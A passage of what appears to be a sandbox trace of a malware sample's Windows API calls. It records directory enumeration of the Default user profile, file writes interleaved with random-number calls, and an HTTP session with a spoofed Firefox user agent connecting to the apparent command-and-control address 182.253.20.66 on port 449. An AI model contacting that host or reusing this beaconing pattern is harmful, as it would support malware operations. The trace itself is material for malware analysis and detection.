returned 0 [0262.652] FindNextFileW (in: hFindFile=0x2d2690, lpFindFileData=0x1e9690 | out: lpFindFileData=0x1e9690) returned 1 [0262.652] FindNextFileW (in: hFindFile=0x2d2690, lpFindFileData=0x1e9690 | out: lpFindFileData=0x1e9690) returned 1 [0262.652] FindNextFileW (in: hFindFile=0x2d2690, lpFindFileData=0x1e9690 | out: lpFindFileData=0x1e9690) returned 1 [0262.652] FindNextFileW (in: hFindFile=0x2d2690, lpFindFileData=0x1e9690 | out: lpFindFileData=0x1e9690) returned 1 [0262.653] FindNextFileW (in: hFindFile=0x2d2690, lpFindFileData=0x1e9690 | out: lpFindFileData=0x1e9690) returned 1 [0262.653] FindNextFileW (in: hFindFile=0x2d2690, lpFindFileData=0x1e9690 | out: lpFindFileData=0x1e9690) returned 0 [0262.653] FindClose (in: hFindFile=0x2d2690 | out: hFindFile=0x2d2690) returned 1 [0262.653] FindNextFileW (in: hFindFile=0x2d2630, lpFindFileData=0x1ea130 | out: lpFindFileData=0x1ea130) returned 1 [0262.654] FindNextFileW (in: hFindFile=0x2d2630, lpFindFileData=0x1ea130 | out: lpFindFileData=0x1ea130) returned 0 [0262.654] FindClose (in: hFindFile=0x2d2630 | out: hFindFile=0x2d2630) returned 1 [0262.654] FindNextFileW (in: hFindFile=0x2d24b0, lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 1 [0262.654] lstrcmpiW (lpString1="Administrative Tools", lpString2=".") returned 1 [0262.654] lstrcmpiW (lpString1="Administrative Tools", lpString2="..") returned 1 [0262.654] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Administrative Tools\\\\*", lpFindFileData=0x1ea130 | out: lpFindFileData=0x1ea130) returned 0x2d2630 [0262.655] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.655] FindNextFileW (in: hFindFile=0x2d2630, lpFindFileData=0x1ea130 | out: lpFindFileData=0x1ea130) returned 1 [0262.655] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.655] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.655] FindNextFileW (in: hFindFile=0x2d2630, lpFindFileData=0x1ea130 | out: lpFindFileData=0x1ea130) returned 1 [0262.655] FindNextFileW (in: hFindFile=0x2d2630, lpFindFileData=0x1ea130 | out: lpFindFileData=0x1ea130) returned 0 [0262.655] FindClose (in: hFindFile=0x2d2630 | out: hFindFile=0x2d2630) returned 1 [0262.655] FindNextFileW (in: hFindFile=0x2d24b0, lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 1 [0262.655] FindNextFileW (in: hFindFile=0x2d24b0, lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 1 [0262.655] FindNextFileW (in: hFindFile=0x2d24b0, lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 1 [0262.655] FindNextFileW (in: hFindFile=0x2d24b0, lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 1 [0262.655] lstrcmpiW (lpString1="Maintenance", lpString2=".") returned 1 [0262.656] lstrcmpiW (lpString1="Maintenance", lpString2="..") returned 1 [0262.656] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Maintenance\\\\*", lpFindFileData=0x1ea130 | out: lpFindFileData=0x1ea130) returned 0x2d2630 [0262.656] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.656] FindNextFileW (in: hFindFile=0x2d2630, lpFindFileData=0x1ea130 | out: lpFindFileData=0x1ea130) returned 1 [0262.656] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.656] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.656] FindNextFileW (in: hFindFile=0x2d2630, lpFindFileData=0x1ea130 | out: lpFindFileData=0x1ea130) returned 1 [0262.656] FindNextFileW (in: hFindFile=0x2d2630, lpFindFileData=0x1ea130 | out: lpFindFileData=0x1ea130) returned 1 [0262.656] FindNextFileW (in: hFindFile=0x2d2630, lpFindFileData=0x1ea130 | out: lpFindFileData=0x1ea130) returned 0 [0262.656] FindClose (in: hFindFile=0x2d2630 | out: hFindFile=0x2d2630) returned 1 [0262.656] FindNextFileW (in: hFindFile=0x2d24b0, lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 1 [0262.656] FindNextFileW (in: hFindFile=0x2d24b0, lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 1 [0262.657] lstrcmpiW (lpString1="Startup", lpString2=".") returned 1 [0262.657] lstrcmpiW (lpString1="Startup", lpString2="..") returned 1 [0262.657] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*", lpFindFileData=0x1ea130 | out: lpFindFileData=0x1ea130) returned 0x2d2630 [0262.657] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.657] FindNextFileW (in: hFindFile=0x2d2630, lpFindFileData=0x1ea130 | out: lpFindFileData=0x1ea130) returned 1 [0262.657] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.657] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.657] FindNextFileW (in: hFindFile=0x2d2630, lpFindFileData=0x1ea130 | out: lpFindFileData=0x1ea130) returned 1 [0262.657] FindNextFileW (in: hFindFile=0x2d2630, lpFindFileData=0x1ea130 | out: lpFindFileData=0x1ea130) returned 0 [0262.657] FindClose (in: hFindFile=0x2d2630 | out: hFindFile=0x2d2630) returned 1 [0262.657] FindNextFileW (in: hFindFile=0x2d24b0, lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 0 [0262.657] FindClose (in: hFindFile=0x2d24b0 | out: hFindFile=0x2d24b0) returned 1 [0262.658] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 0 [0262.658] FindClose (in: hFindFile=0x2d2570 | out: hFindFile=0x2d2570) returned 1 [0262.658] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 1 [0262.658] lstrcmpiW (lpString1="Templates", lpString2=".") returned 1 [0262.658] lstrcmpiW (lpString1="Templates", lpString2="..") returned 1 [0262.658] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Templates\\\\*", lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 0x2d2570 [0262.659] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.659] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.659] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.659] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.659] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 0 [0262.659] FindClose (in: hFindFile=0x2d2570 | out: hFindFile=0x2d2570) returned 1 [0262.659] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 1 [0262.659] lstrcmpiW (lpString1="Themes", lpString2=".") returned 1 [0262.659] lstrcmpiW (lpString1="Themes", lpString2="..") returned 1 [0262.659] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Themes\\\\*", lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 0x2d2570 [0262.660] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.660] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.660] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.661] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.661] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.661] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 0 [0262.661] FindClose (in: hFindFile=0x2d2570 | out: hFindFile=0x2d2570) returned 1 [0262.661] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 0 [0262.661] FindClose (in: hFindFile=0x2d2510 | out: hFindFile=0x2d2510) returned 1 [0262.661] FindNextFileW (in: hFindFile=0x2d23f0, lpFindFileData=0x1ecbb0 | out: lpFindFileData=0x1ecbb0) returned 0 [0262.661] FindClose (in: hFindFile=0x2d23f0 | out: hFindFile=0x2d23f0) returned 1 [0262.661] FindNextFileW (in: hFindFile=0x2d2390, lpFindFileData=0x1ed650 | out: lpFindFileData=0x1ed650) returned 0 [0262.661] FindClose (in: hFindFile=0x2d2390 | out: hFindFile=0x2d2390) returned 1 [0262.998] wsprintfA (in: param_1=0x1eddc0, param_2=" %u %u %u %u" | out: param_1=" 3114410263 11 16 25") returned 20 [0262.998] WriteFile (in: hFile=0x1d0, lpBuffer=0x2d1920*, nNumberOfBytesToWrite=0x79, lpNumberOfBytesWritten=0x1edc48, lpOverlapped=0x0 | out: lpBuffer=0x2d1920*, lpNumberOfBytesWritten=0x1edc48*=0x79, lpOverlapped=0x0) returned 1 [0262.998] WriteFile (in: hFile=0x1d0, lpBuffer=0x1edc38*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1edc48, lpOverlapped=0x0 | out: lpBuffer=0x1edc38*, lpNumberOfBytesWritten=0x1edc48*=0x2, lpOverlapped=0x0) returned 1 [0262.998] rand () returned 10522 [0262.998] rand () returned 20294 [0262.998] rand () returned 5129 [0262.998] rand () returned 16348 [0262.998] rand () returned 11843 [0262.998] rand () returned 11483 [0262.998] rand () returned 13660 [0262.998] rand () returned 10730 [0262.998] rand () returned 4411 [0262.998] rand () returned 32460 [0262.998] rand () returned 13376 [0262.999] rand () returned 8026 [0262.999] rand () returned 27099 [0262.999] rand () returned 7261 [0262.999] rand () returned 28281 [0262.999] rand () returned 7212 [0262.999] rand () returned 17457 [0262.999] rand () returned 8501 [0262.999] rand () returned 4513 [0262.999] rand () returned 21983 [0262.999] rand () returned 1235 [0262.999] rand () returned 4195 [0262.999] rand () returned 16928 [0262.999] rand () returned 5777 [0262.999] rand () returned 26483 [0262.999] rand () returned 10398 [0262.999] rand () returned 11864 [0262.999] rand () returned 21351 [0262.999] rand () returned 19380 [0262.999] rand () returned 19921 [0262.999] rand () returned 25120 [0262.999] rand () returned 559 [0262.999] rand () returned 17468 [0262.999] rand () returned 11223 [0262.999] rand () returned 28276 [0262.999] rand () returned 29252 [0262.999] WriteFile (in: hFile=0x1d0, lpBuffer=0x1eda00*, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x1ed9f8, lpOverlapped=0x0 | out: lpBuffer=0x1eda00*, lpNumberOfBytesWritten=0x1ed9f8*=0x22, lpOverlapped=0x0) returned 1 [0262.999] WriteFile (in: hFile=0x1d0, lpBuffer=0x1ed9e8*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1ed9f8, lpOverlapped=0x0 | out: lpBuffer=0x1ed9e8*, lpNumberOfBytesWritten=0x1ed9f8*=0x2, lpOverlapped=0x0) returned 1 [0263.000] rand () returned 7178 [0263.000] rand () returned 30338 [0263.000] rand () returned 14698 [0263.000] rand () returned 11442 [0263.000] rand () returned 17930 [0263.000] rand () returned 27363 [0263.000] rand () returned 2664 [0263.000] rand () returned 8091 [0263.000] rand () returned 27367 [0263.000] rand () returned 30149 [0263.000] rand () returned 9877 [0263.000] rand () returned 6362 [0263.000] rand () returned 2337 [0263.000] rand () returned 9083 [0263.000] rand () returned 4493 [0263.000] rand () returned 21477 [0263.000] rand () returned 23391 [0263.000] rand () returned 15580 [0263.000] rand () returned 18009 [0263.000] rand () returned 7928 [0263.000] rand () returned 30982 [0263.000] rand () returned 13707 [0263.000] rand () returned 31902 [0263.000] rand () returned 23408 [0263.000] rand () returned 25866 [0263.000] rand () returned 20348 [0263.000] rand () returned 19988 [0263.000] rand () returned 23925 [0263.000] rand () returned 32517 [0263.000] rand () returned 6067 [0263.000] rand () returned 20538 [0263.000] rand () returned 28379 [0263.000] rand () returned 2694 [0263.001] rand () returned 8271 [0263.001] rand () returned 30281 [0263.001] rand () returned 31050 [0263.001] rand () returned 16555 [0263.001] rand () returned 7112 [0263.001] rand () returned 20326 [0263.001] rand () returned 7069 [0263.001] rand () returned 8178 [0263.001] rand () returned 15733 [0263.001] rand () returned 29979 [0263.001] rand () returned 11913 [0263.001] rand () returned 28236 [0263.001] rand () returned 849 [0263.001] rand () returned 15880 [0263.001] rand () returned 31871 [0263.001] rand () returned 8563 [0263.001] rand () returned 19710 [0263.001] rand () returned 2262 [0263.001] rand () returned 12499 [0263.001] rand () returned 8574 [0263.001] rand () returned 25610 [0263.001] rand () returned 13165 [0263.001] rand () returned 16925 [0263.001] rand () returned 6579 [0263.001] rand () returned 22898 [0263.001] rand () returned 4711 [0263.001] rand () returned 23520 [0263.001] rand () returned 19356 [0263.001] rand () returned 23652 [0263.001] rand () returned 31940 [0263.001] rand () returned 2921 [0263.001] rand () returned 6237 [0263.002] rand () returned 28233 [0263.002] rand () returned 16351 [0263.002] rand () returned 13306 [0263.002] rand () returned 13380 [0263.002] rand () returned 6147 [0263.002] rand () returned 4000 [0263.002] rand () returned 3624 [0263.002] rand () returned 14498 [0263.002] WriteFile (in: hFile=0x1d0, lpBuffer=0x1eda00*, nNumberOfBytesToWrite=0x47, lpNumberOfBytesWritten=0x1ed9f8, lpOverlapped=0x0 | out: lpBuffer=0x1eda00*, lpNumberOfBytesWritten=0x1ed9f8*=0x47, lpOverlapped=0x0) returned 1 [0263.002] WriteFile (in: hFile=0x1d0, lpBuffer=0x1ed9e8*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1ed9f8, lpOverlapped=0x0 | out: lpBuffer=0x1ed9e8*, lpNumberOfBytesWritten=0x1ed9f8*=0x2, lpOverlapped=0x0) returned 1 [0263.002] rand () returned 1139 [0263.002] rand () returned 18164 [0263.002] rand () returned 13954 [0263.002] rand () returned 2009 [0263.002] rand () returned 9279 [0263.002] rand () returned 3194 [0263.002] rand () returned 3955 [0263.002] rand () returned 14263 [0263.002] rand () returned 16082 [0263.002] rand () returned 12160 [0263.002] rand () returned 31338 [0263.002] rand () returned 30210 [0263.002] rand () returned 5284 [0263.002] rand () returned 20781 [0263.002] rand () returned 11319 [0263.002] rand () returned 6996 [0263.002] rand () returned 30395 [0263.002] rand () returned 11775 [0263.003] rand () returned 8377 [0263.003] rand () returned 24617 [0263.003] rand () returned 30578 [0263.003] rand () returned 7033 [0263.003] rand () returned 29110 [0263.003] rand () returned 26679 [0263.003] rand () returned 6265 [0263.003] rand () returned 3605 [0263.003] rand () returned 5386 [0263.003] rand () returned 6142 [0263.003] rand () returned 6685 [0263.003] rand () returned 15232 [0263.003] rand () returned 17924 [0263.003] rand () returned 26783 [0263.003] rand () returned 20425 [0263.003] rand () returned 11526 [0263.003] rand () returned 7693 [0263.003] rand () returned 11761 [0263.003] rand () returned 7629 [0263.003] rand () returned 22091 [0263.003] rand () returned 8330 [0263.003] rand () returned 722 [0263.003] rand () returned 1119 [0263.003] rand () returned 1085 [0263.003] rand () returned 15876 [0263.003] rand () returned 20411 [0263.003] rand () returned 23519 [0263.003] rand () returned 14406 [0263.003] rand () returned 4742 [0263.003] rand () returned 8088 [0263.003] rand () returned 9824 [0263.004] WriteFile (in: hFile=0x1d0, lpBuffer=0x1eda00*, nNumberOfBytesToWrite=0x2f, lpNumberOfBytesWritten=0x1ed9f8, lpOverlapped=0x0 | out: lpBuffer=0x1eda00*, lpNumberOfBytesWritten=0x1ed9f8*=0x2f, lpOverlapped=0x0) returned 1 [0263.004] WriteFile (in: hFile=0x1d0, lpBuffer=0x1ed9e8*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1ed9f8, lpOverlapped=0x0 | out: lpBuffer=0x1ed9e8*, lpNumberOfBytesWritten=0x1ed9f8*=0x2, lpOverlapped=0x0) returned 1 [0263.004] rand () returned 17350 [0263.004] rand () returned 25415 [0263.004] rand () returned 14038 [0263.004] rand () returned 6755 [0263.004] rand () returned 14272 [0263.004] rand () returned 8073 [0263.004] rand () returned 8381 [0263.004] rand () returned 19173 [0263.004] rand () returned 31956 [0263.004] rand () returned 26817 [0263.004] rand () returned 9984 [0263.004] rand () returned 4253 [0263.004] rand () returned 10093 [0263.004] rand () returned 26104 [0263.004] rand () returned 26514 [0263.004] rand () returned 6271 [0263.004] rand () returned 23611 [0263.004] WriteFile (in: hFile=0x1d0, lpBuffer=0x1eda00*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1ed9f8, lpOverlapped=0x0 | out: lpBuffer=0x1eda00*, lpNumberOfBytesWritten=0x1ed9f8*=0x10, lpOverlapped=0x0) returned 1 [0263.004] WriteFile (in: hFile=0x1d0, lpBuffer=0x1ed9e8*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1ed9f8, lpOverlapped=0x0 | out: lpBuffer=0x1ed9e8*, lpNumberOfBytesWritten=0x1ed9f8*=0x2, lpOverlapped=0x0) returned 1 [0263.004] rand () returned 26225 [0263.004] rand () returned 31932 [0263.004] rand () returned 15236 [0263.004] rand () returned 22756 [0263.004] rand () returned 6028 [0263.005] rand () returned 27501 [0263.005] rand () returned 941 [0263.005] rand () returned 29942 [0263.005] rand () returned 20970 [0263.005] rand () returned 19409 [0263.005] rand () returned 582 [0263.005] rand () returned 12065 [0263.005] rand () returned 16850 [0263.005] rand () returned 24612 [0263.005] rand () returned 23400 [0263.005] rand () returned 6819 [0263.005] rand () returned 28372 [0263.005] rand () returned 3529 [0263.005] rand () returned 10945 [0263.005] rand () returned 16643 [0263.005] rand () returned 26284 [0263.005] rand () returned 27798 [0263.005] rand () returned 9623 [0263.005] rand () returned 19458 [0263.005] rand () returned 3945 [0263.005] rand () returned 24691 [0263.005] rand () returned 7691 [0263.005] rand () returned 3023 [0263.005] rand () returned 25806 [0263.005] rand () returned 28963 [0263.005] rand () returned 19355 [0263.005] rand () returned 11642 [0263.005] rand () returned 9464 [0263.005] rand () returned 21601 [0263.005] rand () returned 31979 [0263.005] rand () returned 13739 [0263.005] rand () returned 12353 [0263.006] rand () returned 24111 [0263.006] rand () returned 5829 [0263.006] rand () returned 5012 [0263.006] rand () returned 8293 [0263.006] rand () returned 19307 [0263.006] rand () returned 1118 [0263.006] rand () returned 24612 [0263.006] rand () returned 23267 [0263.006] rand () returned 6819 [0263.006] rand () returned 31963 [0263.006] rand () returned 7549 [0263.006] rand () returned 8870 [0263.006] rand () returned 26410 [0263.006] rand () returned 16915 [0263.006] rand () returned 2729 [0263.006] rand () returned 27877 [0263.006] rand () returned 31339 [0263.006] rand () returned 15511 [0263.006] rand () returned 24456 [0263.006] rand () returned 32072 [0263.006] rand () returned 1918 [0263.006] rand () returned 6384 [0263.006] rand () returned 1293 [0263.006] rand () returned 3404 [0263.006] rand () returned 17657 [0263.006] rand () returned 18983 [0263.006] rand () returned 7594 [0263.006] rand () returned 744 [0263.006] rand () returned 22793 [0263.006] rand () returned 5515 [0263.006] rand () returned 29193 [0263.006] rand () returned 31345 [0263.007] rand () returned 19393 [0263.007] rand () returned 2990 [0263.007] rand () returned 5629 [0263.007] rand () returned 10171 [0263.007] rand () returned 29617 [0263.007] WriteFile (in: hFile=0x1d0, lpBuffer=0x1eda00*, nNumberOfBytesToWrite=0x48, lpNumberOfBytesWritten=0x1ed9f8, lpOverlapped=0x0 | out: lpBuffer=0x1eda00*, lpNumberOfBytesWritten=0x1ed9f8*=0x48, lpOverlapped=0x0) returned 1 [0263.007] WriteFile (in: hFile=0x1d0, lpBuffer=0x1ed9e8*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1ed9f8, lpOverlapped=0x0 | out: lpBuffer=0x1ed9e8*, lpNumberOfBytesWritten=0x1ed9f8*=0x2, lpOverlapped=0x0) returned 1 [0263.007] rand () returned 4785 [0263.007] rand () returned 22968 [0263.007] rand () returned 21121 [0263.007] rand () returned 4283 [0263.007] rand () returned 26049 [0263.007] rand () returned 23358 [0263.007] rand () returned 29190 [0263.007] rand () returned 2338 [0263.007] rand () returned 11746 [0263.007] rand () returned 19482 [0263.007] rand () returned 11261 [0263.007] rand () returned 31972 [0263.007] rand () returned 6123 [0263.007] rand () returned 16207 [0263.007] rand () returned 15014 [0263.007] rand () returned 9034 [0263.007] rand () returned 3026 [0263.007] rand () returned 5009 [0263.007] rand () returned 32315 [0263.007] rand () returned 9917 [0263.008] rand () returned 26922 [0263.008] rand () returned 19893 [0263.008] rand () returned 15754 [0263.008] rand () returned 29403 [0263.008] rand () returned 27882 [0263.008] rand () returned 30567 [0263.008] rand () returned 23011 [0263.008] rand () returned 10442 [0263.008] rand () returned 9328 [0263.008] rand () returned 22043 [0263.008] rand () returned 31284 [0263.008] rand () returned 11724 [0263.008] rand () returned 4550 [0263.008] rand () returned 3654 [0263.008] rand () returned 29043 [0263.008] rand () returned 2068 [0263.008] rand () returned 25891 [0263.008] rand () returned 1741 [0263.008] rand () returned 25660 [0263.008] rand () returned 32217 [0263.008] rand () returned 28597 [0263.008] rand () returned 8381 [0263.008] rand () returned 29116 [0263.008] rand () returned 10920 [0263.008] rand () returned 13213 [0263.054] StrStrIW (lpFirst="182.253.20.66", lpSrch=".onion") returned 0x0 [0263.054] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2df070 [0263.055] WinHttpConnect (hSession=0x2df070, pswzServerName="182.253.20.66", nServerPort=0x1c1, dwReserved=0x0) returned 0x2e3f40 Thread: id = 367 os_tid = 0x140 Thread: id = 368 os_tid = 0x8b4 Thread: id = 369 os_tid = 0x558 Thread: id = 370 os_tid = 0x870 [0263.056] Sleep (dwMilliseconds=0x3e8) [0264.057] Sleep (dwMilliseconds=0x3e8) [0265.071] Sleep (dwMilliseconds=0x3e8) [0266.084] Sleep (dwMilliseconds=0x3e8) [0267.098] Sleep (dwMilliseconds=0x3e8) [0268.113] Sleep (dwMilliseconds=0x3e8) [0269.127] Sleep (dwMilliseconds=0x3e8) [0270.166] Sleep (dwMilliseconds=0x3e8) [0271.173] Sleep (dwMilliseconds=0x3e8) [0272.183] Sleep (dwMilliseconds=0x3e8) [0273.198] Sleep (dwMilliseconds=0x3e8) [0274.211] Sleep (dwMilliseconds=0x3e8) [0275.225] Sleep (dwMilliseconds=0x3e8) [0276.239] Sleep (dwMilliseconds=0x3e8) Thread: id = 371 os_tid = 0x41c Thread: id = 372 os_tid = 0x5e8 Thread: id = 373 os_tid = 0x974